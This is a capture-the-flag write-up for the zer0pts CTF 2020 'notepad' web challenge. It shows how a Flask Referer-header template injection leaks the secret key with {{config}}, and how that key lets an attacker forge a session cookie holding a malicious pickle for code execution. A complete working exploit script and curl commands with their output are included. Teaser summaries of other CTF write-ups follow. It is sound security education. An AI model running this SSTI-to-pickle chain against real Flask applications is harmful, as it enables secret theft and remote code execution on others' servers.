Try   HackMD

[zer0pts CTF 2020] notepad

tags: zer0pts CTF, zer0pts CTF 2020, web

Solution

As you can see from app.py, there is a Server-Side Template Injection (SSTI) vulnerability via Referer header in 404 page.












@app.errorhandler(404)
def page_not_found(error):
    """ Automatically go back when page is not found """
    referrer = flask.request.headers.get("Referer")
    
    if referrer is None: referrer = '/'
    if not valid_url(referrer): referrer = '/'
    
    html = '<html><head><meta http-equiv="Refresh" content="3;URL={}"><title>404 Not Found</title></head><body>Page not found. Redirecting...</body></html>'.format(referrer)
    
    return flask.render_template_string(html), 404

In Flask, SSTI can easily be led to arbitrary code execution like this article. However, Referer header is checked with valid_url function that checks if the URL starts with its host and the length of the path is shorter than 16 chars.









def valid_url(url):
    """ Check if given url is valid """
    host = flask.request.host_url
    
    if not url.startswith(host): return False  # Not from my server
    if len(url) - len(host) > 16: return False # Referer may be also 404
    
    return True

So, with this SSTI vulnerability, you can do limited things like exfiltrating SECRET_KEY, which is used to sign and verify client session data, with {{config}}.

$ curl http://3.112.201.75:8001/404 -H "Referer: http://3.112.201.75:8001/{{config}}"
<html><head><meta http-equiv="Refresh" content="3;URL=http://3.112.201.75:8001/&lt;Config {… &#39;SECRET_KEY&#39;: b&#39;\\\xe4\xed}w\xfd3\xdc\x1f\xd72\x07/C\xa9I&#39;, …

Anyway, it's useful to tamper sessions. In this app, session is used for storing notes, which is serialized with pickle.









@app.route('/new', methods=['GET'])
def new():
    """ Create a new note """
    data = load()
    data.append({"date": now(), "text": "", "title": "*New Note*"})
    flask.session['savedata'] = base64.b64encode(pickle.dumps(data))
    
    return flask.redirect('/note/' + str(len(data) - 1))










def load():
    """ Load saved notes """
    try:
        savedata = flask.session.get('savedata', None)
        data = pickle.loads(base64.b64decode(savedata))
    except:
        data = [{"date": now(), "text": "", "title": "*New Note*"}]
    
    return data

As noted in the official document, pickle module is not secure to load untrusted data and can be led to arbitrary code execution.

While referring to past challenge, let's write an exploit that retrieves SECRET_KEY, sign payload with obtained SECRET_KEY, and send request with tampered session.

import base64
import html
import re
import requests
import flask.sessions

HOST = 'http://3.112.201.75:8001/'

class App(object):
  def __init__(self, secret_key):
    self.secret_key = secret_key

def sign(secret_key, data):
  app = App(secret_key)
  si = flask.sessions.SecureCookieSessionInterface()
  s = si.get_signing_serializer(app)
  return s.dumps(data)

r = requests.get(HOST + '404', headers={
  'Referer': HOST + '{{config}}'
})
r = html.unescape(r.content.decode())
secret_key = eval(re.findall(r"'SECRET_KEY': (b'.+?')", r)[0])
print('secret_key:', secret_key)

code = b"c__builtin__\neval\n(S'open(\\'/home/web/flag\\').read()'\ntR"
sig = sign(secret_key, {'savedata': base64.b64encode(b"(lp0\n(dp1\nS'date'\np2\nI0\nsS'text'\np3\nS''\np4\nsS'title'\np5\n" + code + b"p6\nsa.")})

r = requests.get(HOST, cookies={
  'session': sig
})
print(re.findall(rb'(zer0pts\{.+\})', r.content)[0])

$ python solve.py
secret_key: b'\\\xe4\xed}w\xfd3\xdc\x1f\xd72\x07/C\xa9I'
b'zer0pts{fl4sk_s3ss10n_4nd_pyth0n_RCE}'
Last changed by 
st98
https://st98.github.io https://twitter.com/st98_
0
2261

Read more

GuestFS:AFR - zer0pts CTF 2021

Overview This is a service that you can create, read, and delete files including symbolic links. Filename should not contain characters except for 0-9A-Za-z. When you create a symbolic link, the link target should not start with / or contain ... Solution Paths of link targets will be only checked when files are created. Looking through the source code, you will notice that the order of checking a target path is, calling symlink, then checking the target path with readlink. Why does it checks the target path after a symbolic link is created? /* Create a symbolic link */

Mar 7, 2021
Baby SQLi - zer0pts CTF 2021

Overview The flag is in templates/index.html as below. To obtain the flag, you need to be logged in as admin, or read the content of the template file. {% if name == &apos;admin&apos; %} &lt;p&gt;zer0pts{*****CENSORED*****}&lt;/p&gt; {% else %} User input will be embedded in SQL statement, however, SQL Injection in /login seems to be prevented by escaping it.

Mar 6, 2021
Kantan Calc - zer0pts CTF 2021

Overview User input and the flag will be inserted into &apos;use strict&apos;; (function () { return ${code}; /* ${FLAG} */ })(), and the server executes the code in sandbox. const result = vm.runInNewContext(`&apos;use strict&apos;; (function () { return ${code}; /* ${FLAG} */ })()`, {}, { timeout: 100 }); As you can see in the code, the flag is inserted as a comment in a function, after user input. So, what you need to do is somehow exfiltrating the comment by, for example, converting the function to String and outputting it. Since the server sets the maximum length of user input to 29 characters, you need to do code-golf with some features available in recent ECMAScript. const code = req.query.code + &apos;&apos;;

Mar 6, 2021
Simple Blog - zer0pts CTF 2021

Overview This application fetches api.php and renders the contents by JSONP. The length of the name of a callback function is up to 20 characters. &lt;?php header(&apos;Content-Type: application/javascript&apos;); $callback = $_GET[&apos;callback&apos;] ?? &apos;render&apos;; if (strlen($callback) &gt; 20) { die(&apos;throw new Error(&quot;callback name is too long&quot;)&apos;); }

Mar 6, 2021
Read more from st98
Published on HackMD